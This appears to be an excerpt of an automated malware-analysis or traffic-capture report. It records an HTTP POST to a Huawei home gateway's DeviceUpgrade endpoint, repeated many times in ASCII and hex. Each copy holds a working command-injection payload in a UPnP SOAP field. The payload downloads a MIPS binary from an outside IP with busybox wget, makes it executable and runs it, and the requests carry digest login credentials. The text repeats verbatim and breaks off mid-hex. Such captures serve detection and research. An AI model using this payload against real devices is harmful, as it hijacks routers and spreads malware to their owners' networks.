Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 